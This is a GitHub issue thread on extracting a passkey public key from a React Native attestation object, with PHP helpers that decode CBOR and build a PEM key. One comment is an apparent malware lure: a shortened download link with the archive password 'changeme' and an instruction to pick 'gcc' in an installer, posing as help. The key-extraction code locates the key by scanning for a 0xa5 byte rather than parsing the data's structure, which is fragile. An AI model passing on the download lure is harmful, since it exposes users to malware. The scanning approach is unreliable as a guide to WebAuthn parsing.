### ISSUE TITLE
Extract Public Key

### ISSUE THREAD

**Issue by ChildOTK** [f-23/react-native-passkey#48]
I am building a new react native application to compliment an existing web application built in PHP.

I am generating passkeys in the react native application and trying to  save the passkey to the user account within my web application. The goal is for the user to be able to login to the web application, using the passkey generated on their device by the react native application, or vice versa. For now I am focusing on passkeys generated by the react native application. 

How would one extract the public key created by the passkey in react native?

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by sirkostya009** [comment]
Public key is stored in authenticatorData of an attestation request. https://www.w3.org/TR/webauthn-3/#sctn-authenticator-data

**Comment by ChildOTK** [comment]
Thank you

**Comment by yagopv** [comment]
@ChildOTK, were you able to extract the public key?

Thanks!

**Comment by ChildOTK** [comment]
@yagopv, after a somewhat long battle, yes, I was able to. I am able to extract public keys and save this to my user records so on my web version of my app, the same passkey can be used to authenticate the user, even though the passkey was generated within react native.

I ended up sending the attestation object to my web server, and extract and save the public key on that end. Storing it in a PEM format.

**Comment by yagopv** [comment]
> @yagopv, after a somewhat long battle, yes, I was able to. I am able to extract public keys and save this to my user records so on my web version of my app, the same passkey can be used to authenticate the user, even though the passkey was generated within react native.
> 
> I ended up sending the attestation object to my web server, and extract and save the public key on that end. Storing it in a PEM format.

oh great!. And how do you manage to extract it? I'm having [this issue](https://github.com/f-23/react-native-passkey/issues/55) right now and even cannot start trying to decode it :(

**Comment by ChildOTK** [comment]
Sorry for the delay getting back with you, i've been swamped lately.

So on my web server, using PHP I have a 3 step process.

1. Extract the raw key from the attestation object
2. Parse the raw key into a better format to convert to PEM format
3. Convert raw key to PEM format
4. Store converted PEM format key to use for authentication later

Here's some simple helper functions I use:

`function extractPublicKeyFromAttestation($attestationObject) {
    // Decode the base64url encoded attestation object
    $decodedAttestationObject = base64url_decode($attestationObject);

    // Parse the CBOR-encoded attestation object
    $attestationData = CBOREncoder::decode($decodedAttestationObject);

    // echo "Attestation data structure:\n";
    // var_dump($attestationData);

    // The authData should be a CBORByteString within the attestation object
    if (!isset($attestationData['authData']) || !($attestationData['authData'] instanceof CBOR\Types\CBORByteString)) {
        throw new Exception("authData not found or not a CBORByteString");
    }

    $authData = $attestationData['authData']->get_byte_string();

    // echo "AuthData length: " . strlen($authData) . "\n";
    // echo "AuthData hex: " . bin2hex($authData) . "\n";

    // The public key starts after a variable-length offset
    $offset = 55; // Start with a fixed offset
    while ($offset < strlen($authData) && ord($authData[$offset]) !== 0xa5) {
        $offset++;
    }
    $publicKeyCose = substr($authData, $offset);

    // echo "Public key COSE length: " . strlen($publicKeyCose) . "\n";
    // echo "Public key COSE hex: " . bin2hex($publicKeyCose) . "\n";

    // Return the raw public key data
    return $publicKeyCose;
}`

`function parseCOSEKey($coseKey) {
    // echo "COSE Key hex: " . bin2hex($coseKey) . "\n";
    // echo "Raw key bytes: " . implode(' ', array_map(function($byte) { return sprintf('%02x', ord($byte)); }, str_split($coseKey))) . "\n";

    $coseMap = CBOREncoder::decode($coseKey);

    $kty = $coseMap[1] ?? null;
    $alg = $coseMap[3] ?? null;
    $crv = $coseMap[-1] ?? null;
    $x = $coseMap[-2] ?? null;
    $y = $coseMap[-3] ?? null;

    if ($kty !== 2) {
        throw new Exception("Unsupported key type: $kty");
    }

    if ($alg !== -7) {
        throw new Exception("Unsupported algorithm: $alg");
    }

    if ($crv !== 1) {
        throw new Exception("Unsupported curve: $crv");
    }

    // echo "Key Type (kty): " . $kty . " (EC2 - Elliptic Curve Keys w/ x- and y-coordinate pair)\n";
    // echo "Algorithm (alg): " . $alg . " (ES256 - ECDSA with SHA-256)\n";
    // echo "Curve (crv): " . $crv . " (P-256 - NIST P-256 also known as secp256r1)\n";
    // echo "X-coordinate length: " . ($x instanceof CBOR\Types\CBORByteString ? strlen($x->get_byte_string()) : strlen($x)) . "\n";
    // echo "Y-coordinate length: " . ($y instanceof CBOR\Types\CBORByteString ? strlen($y->get_byte_string()) : strlen($y)) . "\n";

    return [
        'kty' => $kty,
        'alg' => $alg,
        'keyData' => [
            'curve' => $crv,
            'x' => $x instanceof CBOR\Types\CBORByteString ? bin2hex($x->get_byte_string()) : bin2hex($x),
            'y' => $y instanceof CBOR\Types\CBORByteString ? bin2hex($y->get_byte_string()) : bin2hex($y)
        ]
    ];
}`

`function createPEMPublicKey($parsedKey) {
    // Ensure we have the required data
    if ($parsedKey['kty'] !== 2 || $parsedKey['keyData']['curve'] !== 1) {
        throw new Exception("Unsupported key type or curve");
    }

    // Convert hex strings to binary
    $x = hex2bin($parsedKey['keyData']['x']);
    $y = hex2bin($parsedKey['keyData']['y']);

    // Combine x and y coordinates (uncompressed point format)
    $pubkey = "\x04" . $x . $y;

    // Create the EC key using DER encoding
    $der = "\x30\x59\x30\x13\x06\x07\x2a\x86\x48\xce\x3d\x02\x01\x06\x08\x2a\x86\x48\xce\x3d\x03\x01\x07\x03\x42\x00" . $pubkey;

    // Convert DER to PEM
    $pem = "-----BEGIN PUBLIC KEY-----\n";
    $pem .= chunk_split(base64_encode($der), 64, "\n");
    $pem .= "-----END PUBLIC KEY-----\n";

    return $pem;
}`

Additionally I use the following package from composer:

`composer require 2tvenom/cborencode`

This is the just of it.

**Comment by yagopv** [comment]
Hey @ChildOTK , thanks !!. That's helpful :)
